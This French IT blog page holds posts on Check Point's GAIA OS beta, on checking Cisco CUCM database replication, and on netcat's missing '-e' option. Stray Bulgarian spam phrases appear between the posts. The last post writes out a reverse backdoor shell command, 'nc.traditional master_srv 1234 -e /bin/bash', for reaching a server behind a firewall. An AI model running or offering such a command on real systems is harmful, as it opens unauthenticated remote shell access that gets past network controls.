Un premier aperçu de Checkpoint GAIA

 

GAIA est le nom du nouvel OS de CheckPoint, la convergence entre SPLAT (basé sur du RedHat) et IPSO (l’OS type BSD de Nokia).
Nous avons eu accès à la version beta (Early Availibility n°5 , aka EA5) avant le lancement officiel.

Voici ci-dessous la reprise des tweets que nous avons réalisés lors de nos tests :

La bannière reprend le thème CheckPoint :

pic.twitter.com/ABnI7pYr

Deux (petites) nouveautés : la console embarquée Web (à la Fortinet) et les notes (scratchpad) :

pic.twitter.com/VXLsAKE9

CP75.30 sur Gaia EA5 : la config de IPv6 des interfaces est grisée… bizarre car on peut bien ajouter des routes ipv6

pic.twitter.com/t3BXtp51

Autant pour moi pour IPv6 : il faut l’activer globalement, et rebooter la gateway

pic.twitter.com/ic74cDze

PBR (Policy Based Routing) ok

pic.twitter.com/Tuv2x4f2

La nouveauté attendue (coté SPLAT) : VRRP

pic.twitter.com/SzRtaEdH

L’écran sur les entrées ARP :

pic.twitter.com/9txaxSQH

Malheureusement, cela ne concerne pas la fonctionnalité de proxy ARP (qui nécessite l’édition de /etc/local.arp sur SPLAT).

 Откъде да купя иконаидея за подарък

Post to Twitter

Posted in | Leave a comment

[CUCM] Vérifier le statut de réplication entre les membres

Dans un cluster Cisco CUCM composé d’un publisher et de plusieurs subscribers, il arrive que la base de donnée répartie ne soit plus bien synchronisée entre les membres.
Il est critique de réaliser ce diagnostic au plus tôt : la procédure ci-dessous explique comment le réaliser.

Il faut tout d’abord se connecter sur le Publisher (dans notre cas c’est un serveur en version 8.0.3) en SSH et taper la commande utils dbreplication status

admin:utils dbreplication status

-------------------- utils dbreplication status --------------------

Replication status check is now running in background.
Use command 'utils dbreplication runtimestate' to check its progress

The final output will be in file cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_08_31_26.out

Please use "file view activelog cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_08_31_26.out " command to see the output
admin:

La vérification du bon statut de réplication prend du temps : le fichier de résultat ne doit pas être visionné immédiatement. Pour évaluer la progression de ce diagnostic, il faut utiliser la commande utils dbreplication runtimestate

admin:utils dbreplication runtimestate

DB and Replication Services: ALL RUNNING

Cluster Replication State: Replication status command started at: 2012-01-19-08-31
Replication status command in PROGRESS 421 tables checked out of 519
Processing Table: gatewaylayout

Use 'file view activelog cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_08_31_26.out' to see the details

DB Version: ccm8_0_3_20000_2
Number of replicated tables: 519

Cluster Detailed View from PUB (4 Servers):

PING REPLICATION REPL. DBver& REPL. REPLICATION SETUP
SERVER-NAME IP ADDRESS (msec) RPC? STATUS QUEUE TABLES LOOP? (RTMT) & details
----------- ------------ ------ ---- ----------- ----- ------- ----- -----------------
PUB1 192.168.1.65 0.029 Yes Connected 0 match N/A (2) PUB Setup Completed
SUB1 192.168.1.66 0.183 Yes Connected 0 match N/A (2) Setup Completed
SUB2 192.168.1.67 4.37 Yes Connected 0 match N/A (2) Setup Completed
SUB3 192.168.1.77 3.78 Yes Connected 0 match N/A (2) Setup Completed

admin:

la ligne en gras « Replication status command in PROGRESS 421 tables checked out of 519 » permet de connaitre l’avancement.

La colonne « Replication Loop » peut contenir 3 valeurs :

  • 1 : initializing
  • 2 : ok
  • 3 : failed

Une fois le process de statut terminé, on peut visualiser le statut définitif

admin:utils dbreplication runtimestate

DB and Replication Services: ALL RUNNING

Cluster Replication State: Replication status command started at: 2012-01-19-13-44
Replication status command COMPLETED 519 tables checked out of 519
No Errors or Mismatches found.

Use 'file view activelog cm/trace/dbl/sdi/ReplicationStatus.2012_01_19_13_44_12.out' to see the details

DB Version: ccm8_0_3_20000_2
Number of replicated tables: 519

Cluster Detailed View from PUB (4 Servers):

PING REPLICATION REPL. DBver& REPL. REPLICATION SETUP
SERVER-NAME IP ADDRESS (msec) RPC? STATUS QUEUE TABLES LOOP? (RTMT) & details
----------- ------------ ------ ---- ----------- ----- ------- ----- -----------------
PUB1 192.168.1.65 0.025 Yes Connected 0 match N/A (2) PUB Setup Completed
SUB1 192.168.1.181 Yes Connected 444 match N/A (2) Setup Completed
SUB2 192.168.1.67 1.11 Yes Connected 444 match N/A (2) Setup Completed
SUB3 192.168.1.77 1.11 Yes Connected 444 match N/A (2) Setup Completed

художник на икониИкони на светциХудожник

Post to Twitter

Posted in | Tagged , , , | Leave a comment

Netcat et « -e invalid option »

Il est souvent très utile de creer un reverse backdoor shell sur un serveur qui n’est pas accessible directement (par exemple derrière un firewall). C’est alors ce serveur qui lance une connexion sortante vers notre serveur de contrôle.

Or sur certaines distributions (dont Ubuntu, Mint,etc..) netcat (ou « nc ») ne dispose pas de l’option « -e » qui permet de lui attacher un shell (ou autre).

On obtient alors ce message d’erreur :

#nc master_srv 1234 -e /bin/bash
nc: invalid option -- 'e'

Il suffit alors d’installer le package « netcat » :

apt-get install netcat

Et d’utiliser la commande « nc.traditional » :

nc.traditional master_srv 1234 -e /bin/bash

PS : Attention, le flux passe en clair et sans authentification.
Bref, c’est un outil à utiliser de manière très ponctuelle et en connaissance de cause.

Post to Twitter

Posted in | Tagged , , | 2 Comments